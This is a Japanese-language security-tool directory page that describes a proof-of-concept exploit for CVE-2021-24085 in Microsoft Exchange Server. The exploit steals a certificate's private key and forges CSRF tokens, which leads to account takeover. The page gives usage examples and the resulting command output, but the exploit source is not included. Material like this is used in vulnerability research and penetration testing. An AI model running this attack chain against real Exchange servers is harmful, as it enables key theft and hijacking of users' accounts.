Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-24085 — CVE-2021-24085の概念実証エクスプロイト: msExchEcpCanaryトークンの偽造によるMicrosoft Exchange ServerのCSRFベースの権限昇格、アカウントの乗っ取りを可能にします。 | Kitploit
ツール/GitHubGitHub/sourceincite/cve-2021-24085
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

CVE-2021-24085の概念実証エクスプロイト: msExchEcpCanaryトークンの偽造によるMicrosoft Exchange ServerのCSRFベースの権限昇格、アカウントの乗っ取りを可能にします。

リポジトリを見る
71185年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Microsoft Exchange Server msExchEcpCanary クロスサイトリクエストフォージェリ 特権昇格の脆弱性

これはCVE-2021-24085の概念実証です。

  1. poc.py は、内部に秘密鍵を含むターゲットの証明書ファイルをダウンロードします。
  2. YellowCanary は、SIDに基づいて特定のユーザーのmsExchEcpCanary CSRFトークンを生成します。
  3. poc.js は、アカウント乗っ取りを引き起こすCSRFエクスプロイトです。

malicifest.xmlファイルは提供していませんが、以下の参考文献セクションの利用可能なリソースから悪意のあるマニフェストファイルを生成する方法を見つけることができます。

例

内部に秘密鍵を含む証明書にアクセスします:

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

次に、YellowCanaryを使用して、ターゲットユーザーのSIDからCSRFトークンを生成できます:

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

参考文献

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
ツールをダウンロード